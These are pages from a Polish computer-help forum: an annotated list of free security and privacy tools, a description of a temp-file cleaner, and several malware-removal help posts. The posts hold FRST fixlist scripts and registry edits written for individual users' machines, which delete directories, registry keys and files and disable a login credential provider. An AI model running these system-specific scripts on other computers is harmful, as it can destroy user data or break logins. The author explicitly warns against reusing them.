Programy Adaware i Avira kojarzone z instalacjami typu "PUP". Zawierają niepożądane modyfikacje związane ze zmianą strony startowej i wyszukiwarki lub oferty. Adaware występuje także w kontekście naruszeń bezpieczeństwa. McAfee nie wnosi wiele do sprawy, ponadto zawiera sponsorowany wtręt relatywny do rekonfiguracji wyszukiwarki oraz możliwe reklamy. Raczej zalecane na forum do deinstalacji, niż instalacji... W starszych wersjach popularnego rozszerzenia WOT zdowodowano funkcjonalność a'la "spyware" i sprzedaż danych mogących identyfikować użytkowników, a w konsekwencji rozszerzenie zostało tymczasowo usunięte z baz dodatków Firefox i Chrome. Obecnie w bazach nowe "naprawione" wersje, ale aplikuje się zasada ograniczonego zaufania. Ponadto, od jakiegoś czasu rozszerzenie działa na innej zasadzie i posiada "ochronę w czasie rzeczywistym" oraz wersję Premium (Ochrona przed śledzeniem, Ochrona tożsamości, Ochrona poczty e-mail). Adnotacja na temat rozszerzenia Fox Web Security (powiązanego zresztą z własnym FoxDNS). Wprawdzie po długim czasie zostały wydane nowe wersje, ale dodatki ponoć serwują przekierowania / adware. Usłudze DNS też bym nie ufała. Alternatywne przeglądarki z dostosowaniami pod kątem bezpieczeństwa / prywatności: Adaware Safe Browser [Klon Chromium z wyszukiwarką Privado i adblokiem opartym na uBlock. Integralny składnik większego "pakietu" o kwestionowalnej jakości.] AOL Shield Pro Browser [Klon Chromium z zabezpieczeniem przed keyloggerami i przechwytywaniem ekranu] Avast Secure Browser | AVG Secure Browser [Klony Chromium z trybem bankowym, adblokiem bazującym na uBlock Origin i kilkoma innymi zabezpieczeniami] Ghostery Private Browser (ex Ghostery Dawn) [Klon Firefox ze zintegrowanym Ghostery oraz wyszukiwarką Ghostery Private Search / Ghostery Glow. Następca wymarłego Cliqz.] Iridium Browser [Klon Chromium z modyfikacjami pod kątem prywatności. Wersja dla Windows od długiego czasu bez aktualizacji.] LibreWolf [Klon Firefox z dostosowaniami pod kątem prywatności i uBlock Origin. Zastępuje nierozwijany Librefox.] Sphere Browser [Na silniku QtWebEngine, z funkcjami Tor i anonimizacją] Tor Browser [Klon Firefox ESR z anonimizacją, aktywnym trybem HTTPS oraz zintegrowanym NoScript] Ungoogled Chromium [Klon Chromium z wyciętymi integracjami Google] Na temat tandemu Avast/AVG tutaj. Mało znane klony Chromium i Firefox to projekty "hobbystyczne", mogą być nie za często aktualizowane i felerne. Lepiej sięgnąć po oryginał, czyli stabilną wersję Chromium lub Firefox. Maniacy prywatności mogą ztweakować Firefox posiłkując się skryptem Arkenfox , co da podobne rezultaty jak LibreWolf. Do wglądu tabelka porównująca prywatność w przeglądarkach. Rekomendacje serwisu związanego z prywatnością, po kontrowersjach są dwie strony: Privacy Guides (właściwa) vs. PrivacyTools. VPN (maskowanie adresu IP) AdGuard VPN [W wersji darmowej: 65 lokalizacji z wielu krajów, ograniczona szybkość i 3GB na miesiąc, brak obsługi stron streamingowych i P2P/torrent, instalacja na 2 urządzeniach] ProtonVPN Free [100 serwerów w 3 krajach, ograniczona szybkość, brak obsługi stron streamingowych i P2P/torrent, instalacja na 1 urządzeniu] "VPN" w przeglądarkach działające jak proxy a nie prawdziwy VPN: Firefox Private Network (na Cloudflare, tylko informacyjnie gdyż to płatne rozwiązanie dla użytkowników USA), VPN w Edge (na Cloudflare), VPN w Operze (początkowo na SurfEasy ale teraz nie wiem kto jest dostawcą), Mullvad Privacy Companion. Podane tylko propozycje bez podejrzanych wątków. "Darmowy VPN" może wiązać się z ukrytymi paragrafami i niepożądanymi działaniami, takimi jak: produkcja reklam, naruszenia prywatności, utylizacja połączenia internetowego przez podmioty trzecie i przekierowania na podejrzane serwery. Darmową ofertę należy solidnie zweryfikować wczytując się w opis, EULA czy Politykę prywatności. Przykłady darmowych wersji, których należy unikać: Hola (działania a'la bootnet), ZenMate (reklamy). Szczegółowe tabelki z porównaniem serwisów VPN tutaj i tutaj. Rekomendacje serwisu związanego z prywatnością, po kontrowersjach są dwie strony: Privacy Guides (właściwa) vs. PrivacyTools. Sejfy na hasła, notatki, etc. / Menedżery haseł / Ochrona tożsamości Bez bazy danych ("Stateless"): LessPass PfP: Pain-free Passwords Spectre (ex Master Password) [Póki co aplikacja tylko na iPhone, ale zbliżają się produkcje na inne platformy] Oparte na lokalnej bazie danych: Bimil Buttercup * Enpass Personal * [subscrypcja Enpass Lite, tzn. za darmo są aplikacje na Desktop, limitacje są w mobilnych wersjach] Feather Password Manager KeePass * | KeePassX | KeePassXC KeeWeb * Password Safe Password Tech (ex PWGen) SafeInCloud * * Opcjonalna synchronizacja przy udziale wybranego serwisu (np. Dropbox, OneDrive, Google Drive). W KeePass poprzez wtyczki. Oparte na chmurze / Wymóg rejestracji konta: Avira Password Manager [W wersji darmowej brak powiadomień związanych z bezpieczeństwem/prywatnością kont] [Avira przejęta przez NortonLifeLock] bitwarden [Wersja darmowa w pełni funkcjonalna, ale są też płatne plany Premium] Dashlane Free [Wersja darmowa obecnie nie ma już limitu haseł, ograniczeniem jest 1 urządzenie i brak dodatkowych narzędzi.] [Linki pobierania rozszerzeń] IronVest Essential (ex Blur Free) [Wersja darmowa bez synchronizacji i kopii zapasowych, ponadto brak maskowania kart kredytowych] [Linki pobierania rozszerzeń] Kaspersky Password Manager [Wersja darmowa ograniczona do 15 elementów] LastPass Free [1 urządzenie, magazyn mniejszy niż 1GB, dostępne tylko rozszerzenia ale nie aplikacja LastPass for Applications (wcześniej znana jako "LastApp")] NordPass Free [W wersji darmowej kilka niezbyt istotnych ograniczeń] Norton Password Manager (ex Norton Identity Safe) pCloud Pass Free [Wersja darmowa limitowana do 1 urządzenia] RoboForm Free * [Wersja darmowa bez synchronizacji i kopii zapasowych, nagscreeny] StickyPassword Free [Wersja darmowa bez synchronizacji i kopii zapasowych] Trend Micro Password Manager [Wersja darmowa ograniczona do... 5 haseł, info] True Key [Wersja darmowa ograniczona do 15 haseł, info] * Lokalna baza danych, ale program umieszczony w tej sekcji ze względu na wymóg rejestracji konta. Rekomendacje serwisu związanego z prywatnością, po kontrowersjach są dwie strony: Privacy Guides (właściwa) vs. PrivacyTools. Ciekawe podejście do bezpieczeństwa menedżerów typu online tutaj. Inne pomoce: Spybot Identity Monitor ----> Bez żadnych instalacji ręczne sprawdzanie w bazie Have I Been Pwned. Pozostałe kategorie Sprawdzanie certyfikatów Certificate Patrol NoSnoop SigCheck [Listuje certyfikaty spoza listy MS - Info] + SigcheckGUI Sprawdzanie luk / Aktualizacje oprogramowania Avira Free Software Updater [Nie aktualizować sterowników tą metodą. Instaluje też Avira Browser Safety.] Heimdal Free (ex Thor Free) Ninite OPSWAT Client Patch My PC Home Updater RuckZuck SUMo [Obecnie instalator jest pozbawiony sponsorów - Info] UCheck Free VulnDetect Personal [Alpha] ----> Proszę także przeczytać wątek Aktualizacje programów Tylko raporty: Belarc Advisor - Free Personal PC Audit Bitdefender Home Scanner Tweakery prywatności BloatyNosy / Debloos [prawdopodobnie zastąpi ThisIsWin11 i Privatezilla od tego samego autora] PrivateWin10 Privatezilla [niewykluczone, że aplikacja zniknie na korzyść Debloss] WPD Cookies (Ciasteczka) | Banery GDPR/RODO Consent Blocker Consent-O-Matic Cookie AutoDelete Cookie Dialog Monster I don't care about cookies [Przejęte przez Avast] I still don't care about cookies Polska Ciasteczkowa Zgoda (Polish Cookie Consent) ----> Wybrany adbloker z odpowiednim filtrem, np. uBlock Origin po włączeniu "EasyList Cookie" oraz Polskie Filtry RODO-Ciasteczkowe. Natomiast: "Polska Ciasteczkowa Zgoda zajmuje się tym, czego nie da się załatwić regułą w uBlocku Origin, tzn. wyraża za ciebie zgodę na politykę ciasteczkową/RODO." Zabezpieczenia pod kątem infekcji z mediów przenośnych USB USB Pratirodh ----> Inne przeterminowane metody tutaj Wersje Uniwersalne/Modern (Windows 11/10/8.1) - Sklep Microsoft Sklep był wcześniej ograniczony do aplikacji typu "Uniwersalnego", co sprowadzało się raczej do mało wartościowych gadżetów od producentów antywirusów głównie koncentrujących się na dostarczaniu "szybkiego dostępu" do sprawdzenia statusu danego antywirusa. Obecnie Sklep funkcjonuje jako portal różnych typów aplikacji, czyli można znaleźć tradycyjne instalatory wielu aplikacji wyliczanych wcześniej.

Oprogramowanie dla użytkowników domowych (z wykluczeniem wersji typu "Enterprise"): [Ostatnia aktualizacja: 8.04.2023] ....Temat w permanentnej budowie.... Założeniem listy jest zbiór nowoczesnego oprogramowania, a nie przestarzałych wersji. Jest ona mocno przefiltrowana, przykładowo masa softu wyliczana na konkurencyjnych listach tu celowo wyeliminowana, tak ze względu na datowanie produktów, jak i inne zastrzeżenia. Temat powstaje po to, by nie kombinować i nie zaszkodzić sobie. Powtarzam od dawna w tematach usuwania malware sugestię trzymania się silnych udokumentowanych na rynku marek i nie szukania cudów na kiju. Rozwiązania egzotyczne, niszowe są podawane tu raczej jako ciekawostka aniżeli namowa na zabezpieczanie tymi rozwiązaniami. Pewne programy oznaczyłam na szaro, by zasygnalizować kontakt z programem tylko na poziomie oglądnięcia jego strony domowej. Powody dla tego mogą być różne: mało znany produkt / ciekawostka, istnieje oryginał używający tych samych silników mający lepsze właściwości, przestarzała konstrukcja zabezpieczeń, ostatnia dostępna wersja stara, niedopracowanie aplikacji, reputacja ogólna producenta, kwestionowalne wtręty w aplikacji, zbyt duże ograniczenia wersji darmowej, przetasowania właściciela (ergo niepewna przyszłość produktu). A o beta to wiadomo co sądzić. Podział funkcyjny jest dość umowny, gdyż są programy które nie można poddać jednoznacznej klasyfikacji (np. SpyShelter) i spełniają wymagania kilku sekcji. Ponadto, słowo "antywirus" jest tu użyte z powodów historycznych. Obecnie granica funkcyjna mocno się zaciera i "antywirus" może realizować o wiele więcej funkcji oraz usuwanie innych typów zagrożeń (np. adware/PUP), zaś "antymalware" może mieć zintegrowany silnik antywirusowy. Wiele aplikacji integruje też silniki zewnętrzne (na dziś jest to przede wszystkim silnik Bitdefender) i to jest oznaczone. Porządne fora gdzie można zawsze najszybciej znaleźć nowości i rzetelne dyskusje: Wilders Security Forums, MalwareTips Forums. Spis treści: - Darmowe oprogramowanie - Komercyjne oprogramowanie - Przeterminowane / wycofane z obiegu aplikacje, podejrzane produkcje oraz inne dziwactwa - Aplikacje ograniczające wsparcie dla Windows 7, Windows 8/8.1 i 32-bitowego Windows 10 - Koniec wsparcia dla XP i Vista - Changelog Sygnalizacja wsparcia w przeglądarkach: Oznacza rozszerzenia oficjalnie dostępne w danej bazie dodatków: Firefox Add-ons, Chrome Web Store, Microsoft Edge Addons i Opera Add-ons. Jeśli figuruje tylko znaczek Google Chrome, rozszerzenie prawdopodobnie może działać w innych przeglądarkach opartych na Chromium, np.: czysta wersja Chromium, Microsoft Edge, Opera, Vivaldi, Brave. Natomiast w przypadku przeglądarki Yandex należy opierać się na oznaczeniu Opera. Pale Moon i Basilisk obsługują tylko przestarzałą technologię rozszerzeń XUL i nigdy nie będą obsługiwać WebExtensions, dlatego wybór jest drastycznie ograniczony. W temacie wyróżnione wyłącznie wersje dedykowane zlokalizowane w bazach Pale Moon Add-ons i Basilisk Add-Ons. Stare nieaktualizowane dodatki Firefox z bazy Classic Add-ons Archive nie są polecane. Stara wersja Edge (tzw. Legacy) korzystała z innej bazy dodatków, tzn. Windows Store. Wsparcie dla tej wersji wygasło, jest usuwana przy udziale KB5001330 , a kompatybilne rozszerzenia w sklepie już niedostępne. Internet Explorer to kolejna wymarła przeglądarka. Prawie żaden producent nie obsługuje tego archaizmu. Copyright @picasso fixitpc.pl Powielanie tej pracy zabronione.

TFC - Temp File Cleaner by OldTimer Platforma: Windows XP, Windows Vista, Windows 7 32-bit i 64-bit Licencja: freeware Strona domowa Pobierz Zwykle w temacie użytkownika specjalne skrypty FRST adresują czyszczenie tej sfery i nie jest już wymagane posługiwanie się osobnym programem. TFC to program stary i nieaktualizowany. Nie ma oficjalnej zgodności z Windows 8/8.1 i Windows 10 (mimo że teoretycznie na nich działa), a na Windows 10 pojawiają się skutki uboczne (problemy z przeglądarką Edge). Brak również dostosowań pod nowe ścieżki dostępu, np. czyści tylko starą Operę 12.x a nie zastępującą ją linię Opera 15.x+, nie obsługuje Microsoft Edge (ani starej wersji, ani wersji opartej na Chromium). Te sprawy za to są już dawno załatwione w komendzie FRST. TFC (Temp File Cleaner) - Miniaturowy sprzątacz, którego przeznaczeniem jest przeczyszczenie lokalizacji tymczasowych. Obsługuje czyszczenie: folderów Temp użytkowników (wszystkich kont, w tym systemowych Administrator / LocalService / NetworkService / All Users), folderu Temp systemu (%systemroot%\temp), luźnych plików *.tmp w głównych lokalizacjach (%systemdrive% / %systemroot% / system32) oraz cache wybranych przeglądarek (Internet Explorer, Firefox, Chrome, Opera 12.x, Safari) i Java. Narzędzie przeprowadza proces w trybie zbiorczym i całkowicie automatycznym. Przed uruchomieniem procesu przez buttonik Start należy zapisać wszystko nad czym pracujemy, ponieważ proces może wymagać ukończenia przez restart komputera. W trakcie czyszczenia są pokazywane skanowane lokalizacje wraz z liczbą bajtów z nich usuniętą oraz sumaryczne podliczenie usuniętej całości w MB.

Usunięcie używanych narzędzi KpRm Platforma: Windows 7, Windows 8/8.1, Windows 10 32-bit i 64-bit Licencja: freeware Strona domowa Pobierz Zastępuje zdezelowany DelFix.

Copyright @picasso fixitpc.pl Powielanie tej pracy zabronione. Spis treści: KpRm - Usunięcie używanych narzędzi (zastępuje stary DelFix) Czyszczenie folderów Przywracania systemu Aktualizacje Windows Aktualizacje innych programów (Adobe Flash, Adobe Reader, Java, etc.) Java - dodatkowe kroki Migracja z XP, Vista, Windows 7 i Windows 8.1 na nowszą platformę Lista darmowych i komercyjnych programów zabezpieczających Przeczytaj również: Portale z oprogramowaniem / Instalatory - na co uważać

Na początek, nie podałeś obowiązkowych raportów z FRST. Ocena tylko USBFix to za mało i w ogóle nie pozwala na określenie czy jest jakaś infekcja aktywna w systemie (a nie tylko na urządzeniu). I proszę o nieumieszczanie logów na wklejto, ten serwis przekodowuje specjalne znaki i psuje specjalne rekordy w logach. Raporty umieśc w postaci oryginalnych plików, czyli jako załączniki forum. Te zachowania są związane z ustawieniami polityk urządzenia. Komputer > prawy klik na dysk > Właściwości > karta Sprzęt > podświetl urządzenie i Właściwości > klik w Zmień ustawienia (potwierdz dialog UAC) > pojawi się karta Zasady > powinna byc zaznaczona pierwsza opcja: Folder "msdownld.tmp" jest kojarzony z aktualizacjami Internet Explorer (KB296273). Aktualizacje Windows tworzą foldery tymczasowe na dyskach z obliczoną największą ilością wolnego miejsca, dlatego tez często lądują na innych dyskach niz C, w tym nawet przenośnych. I on się nie pojawił co dopiero, był na urządzeniu dłuzszy czas, tylko prawdopodobnie teraz masz włączone pokazywanie ukrytych folderów. Folder ma stary znacznik czasowy. Ponadto, jest powielony i na drugim dysku. [01/04/2013 - 19:52:40 | HD] - D:\msdownld.tmp [01/01/2013 - 16:41:50 | HD] - G:\msdownld.tmp Jeśli jakieś dane zniknęły, to prędzej na skutek akcji z przepinaniem urządzenia i jakiś błędów. Mogą by uszkodzenia struktury plików, jak np. w w tym temacie. Rozpocznij od: 1. Rekonfiguracji polityk urządzenia, jak podałam powyzej. 2. Skanu dysku pod kątem błędów. Prawoklik na dysk > Właściwości > Narzędzia > Sprawdzanie błędów.

Na wszelki wypadek podaj aktualny wygląd w/w kluczy, czy edycja w ogóle się zapisała, oraz dodatkowy wyciąg z kluczy 32-bit. Czyli do Notatnika wklej: Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters" /s Reg: reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers" /s Reg: reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters" /s Plik zapisz pod nazwą fixlist.txt obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Prawdopodobną przyczyną problemu jest ten drugi wariant, który wspominałam, czyli: "niestandardowy mechanizm poświadczeń logowania wprowadzony przez zewnętrzny program". W systemie siedzi niedomyślny dostawca logowania Qualcomm Atheros: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{ACFC407B-266C-8504-8DAE-F3E276336E4B} (Default) REG_SZ AthCredentialProvider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{ACFC407B-266C-8504-8DAE-F3E276336E4B} (Default) REG_SZ AthCredentialProvider Sprawdź czy "Inny użytkownik" zniknie po wykluczeniu tego dostawcy z mechanizmu logowania: 1. Otwórz Notatnik i wklej w nim: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{ACFC407B-266C-8504-8DAE-F3E276336E4B}] "Disabled"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{ACFC407B-266C-8504-8DAE-F3E276336E4B}] "Disabled"=dword:00000001 Z menu Notatnika > Plik > Zapisz jako > Ustaw rozszerzenie na Wszystkie pliki > Zapisz jako FIX.REG Kliknij prawym na plik i z menu wybierz opcję Scal. Potwierdź import do rejestru. 2. Zresetuj system. Podaj czy "Inny użytkownik" zniknął.

Glazur, proszę nie podbijaj tematu takimi postami, usunęłam ten śmietnik. Jestem nieobecna (wyjazd świąteczny, a teraz po powrocie mam trochę rzeczy osobistych na głowie), odpowiadam gdy jestem w stanie się zająć tematem. A nikt inny nie udziela odpowiedzi prawdopodobnie ze względu na nieprzeczytanie wątku lub niezrozumienie podanych danych. Na szybko: Z tego co rozumiem widzicie tylko jedno konto w Panelu sterowania, FRST wykrywa jednak dwa aktywne konta, a załadowanym jest USER: Potwierdź, że konto Limitowane "Kasia" jest niewidoczne w Panelu sterowania.

Najlepsze życzenia z okazji Świąt Bożego Narodzenia dla wszystkich użytkowników fixitpc.pl! Dużo zdrowia, radości, obfitych "łupów" pod choinką.

Temat przenoszę do działu Windows. Nie widzę tu żadnych oznak infekcji, ale powierdź mi, że poniższy BAT w starcie to Twoja robota: Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\statarp.bat [2015-12-17] () Z raportów nic nie wynika i nie widać błędów pasujących do opisywanych zjawisk. Do rozwiązania są natomiast te zgłoszenia z Dziennika, przy czym ten z "Odmową dostępu" na razie pomijam (to może być wynik aktywności COMODO): Dziennik Aplikacja: ================== Error: (12/21/2015 07:37:12 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (12/21/2015 06:21:06 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas wywoływania procedury RegSetValueExW(0x0000035c,(null),0,REG_BINARY,000000000310EBB0.72). hr = 0x80070005, Odmowa dostępu. Dziennik System: ============= Error: (12/21/2015 07:35:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi OpenERP Server 7.0 z powodu następującego błędu: %%2 Error: (12/21/2015 07:23:33 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi atksgt z powodu następującego błędu: %%1275 Error: (12/21/2015 07:23:33 PM) (Source: Application Popup) (EventID: 875) (User: ) Description: Sterownik atksgt.sys został zablokowany dla ładowania. Error: (12/21/2015 07:21:29 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} Error: (12/21/2015 06:21:54 PM) (Source: sptd) (EventID: 4) (User: ) Description: Sterownik wykrył błąd wewnętrzny w swoich strukturach danych dla . Error: (12/21/2015 05:17:00 PM) (Source: Application Popup) (EventID: 1060) (User: ) Description: Ładowanie sterownika \SystemRoot\System32\DRIVERS\PSKMAD.sys zostało zablokowane z powodu niezgodności z tym systemem. Skontaktuj się z dostawcą oprogramowania w celu uzyskania zgodnej wersji sterownika. 1. Błąd WMI zlikwiduje narzędzie Fix-it: KLIK. 2. Sterownik SPTD "wykrywający błąd wewnętrzny w swoich strukturach" odinstalujesz za pomoc narzędzia SPTDinst: KLIK. Nie ma żadnych programów widocznych które z niego korzystają (Alcohol, DAEMON). 3. Parę sterowników atksgt.sys + lirsgt.sys (zabezpieczenie Tages) odinstalujesz posługując się paczką instalacyjną Tages: KLIK. 4. Resztę błędów z sekcji "System" załatwi poniższy skrypt, który adresuje też wpisy odpadkowe i Tempy. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: FF SearchEngineOrder.1: Ask.com SearchScopes: HKU\S-1-5-21-1647462393-2480976863-1240803015-1000 -> {23AD979E-AD0A-4E0A-9E1E-F7247FB94DEB} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=FF&o=14594&src=kw&q={searchTerms}&locale=&apn_ptnrs=^FV&apn_dtid=^YYYYYY^YY^PL&apn_uid=2bb6ad41-8d91-4057-a490-2d3dfb192983&apn_sauid=A1DEE445-736E-4216-99DA-11F8667B96BF SearchScopes: HKU\S-1-5-21-1647462393-2480976863-1240803015-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear HKU\S-1-5-21-1647462393-2480976863-1240803015-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie HKU\S-1-5-21-1647462393-2480976863-1240803015-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie Toolbar: HKU\S-1-5-21-1647462393-2480976863-1240803015-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [brak pliku] FF Plugin HKU\.DEFAULT: @tracker-software.com/PDF-XChange Editor Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Editor\npPDFXEditPlugin.x64.dll [brak pliku] Task: {58AEA187-00CB-497B-AA5C-F98943D6DF1A} - System32\Tasks\{27D47E0A-080E-4506-A8AB-79424E902BB6} => pcalua.exe -a "D:\Gry\Gra-Wiedzmin.ER.PL\Patch\Patch 1.4 - Edycja Rozszerzona\setup.exe" -d "D:\Gry\Gra-Wiedzmin.ER.PL\Patch\Patch 1.4 - Edycja Rozszerzona" Task: {BB2605DC-C317-4BEF-8D68-291CD0CDE98B} - System32\Tasks\{8FDFA698-384C-4211-B938-7953D80E44C4} => Firefox.exe hxxp://ui.skype.com/ui/0/7.4.0.102/pl/abandoninstall?page=tsProgressBar Task: {BC516846-0B69-4362-BA33-7EB70DED58DF} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe Task: {DCFCE7D9-4AC7-46F8-B9D5-1302C4142F30} - System32\Tasks\EasyPartitionManager => C:\Windows\MSetup\BA46-12225A02\EPM.exe Task: C:\windows\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe GroupPolicyUsers\S-1-5-21-1647462393-2480976863-1240803015-1003\User: Ograniczenia S3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [50320 2015-01-29] (Panda Security, S.L.) S2 openerp-server-7.0; "C:\Program Files (x86)\OpenERP 7.0-20140105-002500\Server\service\OpenERPServerService.exe" [X] S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X] S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X] DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\ProgramData\Kaspersky Lab Setup Files C:\Users\Ruka\AppData\Local\70149b02515b3bb20dd492.47983420 C:\Windows\System32\Drivers\PSKMAD.sys EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wyłącz COMODO, gdyż zablokuje FRST, i FRST nie może działać w piaskownicy (widoczny znak to zielona obwódka wokół okna). Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart. Przedstaw wynikowy fixlog.txt. A puste skróty z kopii Pulpitu to już samodzielnie posprzątaj: C:\Users\Ruka\Desktop\pen_k\Pulpit C:\Users\Ruka\Desktop\pen_k\Nowy folder\Pulpit Skoro na innym urządzeniu, czyli telefonie, występuje to samo, to problem nie leży po stronie widzianego Windows. Nasuwają się ustawienia DNS pobierane z routera. Mógłbyś przetestować czy sprawa ulegnie zmianie, jeśli w routerze tymczasowo ustawisz np. serwery Google: 8.8.8.8 + 8.8.4.4.

Wszystko gładko zrobione. Ostatnia mini-poprawka. Otwórz Notatnik i wklej w nim: DeleteKey: HKLM\SOFTWARE\yoursites123Software RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Anka\Desktop\Stare dane programu Firefox CMD: type C:\Users\Anka\AppData\Roaming\Mozilla\Firefox\Profiles\k2gzr1ao.default-1450731490851\user.js CMD: del /q C:\Users\Anka\AppData\Roaming\Mozilla\Firefox\Profiles\k2gzr1ao.default-1450731490851\user.js CMD: del /q C:\Users\Anka\Downloads\aspsetup.exe CMD: del /q C:\Users\Anka\Downloads\qtokx0wv.exe Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. PS. Widzę Free Zip Opener + WinRAR. Polecam zamiast tych dwóch programów darmowy 7-zip.

O co chodzi z tą wzmianką o poście? A log Addition był urwany, więc albo to jest log który skopiowałeś gdy FRST jeszcze skanował, albo był jakiś błąd podczas skanu. Ale to nie jest aż tak istotne, ten spód raportu nie wnosi nic nowego do sprawy.

Trochę dziwnie wygląda ta instalacja Java, tzn. nie widzę wtyczek Java w Firefox i IE, pomimo że potwierdzasz sprawność z poziomu banku - czy to jest może log FRST robiony, gdy instalacja Java była jeszcze w toku? A poza tym wszystko wygląda czysto i prawie kończymy: 1. Nadal widzę ten ukryty odpadek RealUpgrade 1.1 na liście Dodaj/Usuń - czy była jakaś trudność w wykonaniu poniższego zadania? 2. Ostatni skrypt do FRST usuwający odpadkowe katalogi kont z dysku i czyszczący lokalizacje tymczasowe. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\Documents and Settings\Ania RemoveDirectory: C:\Documents and Settings\Anusia RemoveDirectory: C:\Documents and Settings\Kasia Rymarska\Dane aplikacji\Yahoo! RemoveDirectory: C:\Documents and Settings\Kasia Rymarska\Dane aplikacji\Mozilla\Firefox\Profiles\6v6vtl33.default RemoveDirectory: C:\FRST\Quarantine EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt.

"Obok" = w tym samym folderze gdzie siedzi FRST.

Ten objaw produkuje jedno z dwóch: uszkodzone identyfikatory kont w rejestrze (KLIK) lub niestandardowy mechanizm poświadczeń logowania wprowadzony przez zewnętrzny program (KLIK). Poproszę o podobne dane jak w przypadku w/w tematów, tzn.: 1. Zrób raporty FRST. Dadzą ogólne pojęcie co się uruchamia + w Addition będzie wyciąg kont z identyfikatorami SID. 2. Do Notatnika wklej: Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters" /s Reg: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList" /s Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Brakuje pliku fixlog.txt z wynikami usuwania. Plik jest tam skąd uruchamiałeś FRST.

Ja nadal twierdzę, że określone problemy tworzy McAfee. I nie widać żadnych zmian. Jak były usługi i sterowniki McAfee, tak są nadal: ==================== Usługi (filtrowane) ======================== R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2015-11-10] (McAfee, Inc.) R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [451960 2015-11-02] (McAfee, Inc.) S4 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-07-31] (McAfee, Inc.) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [376264 2015-08-10] (McAfee, Inc.) S4 mfevtp; C:\Windows\system32\mfevtps.exe [256840 2015-09-21] (McAfee, Inc.) ===================== Sterowniki (filtrowane) ========================== S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [80768 2015-08-10] (McAfee, Inc.) R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [413432 2015-08-10] (McAfee, Inc.) R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349096 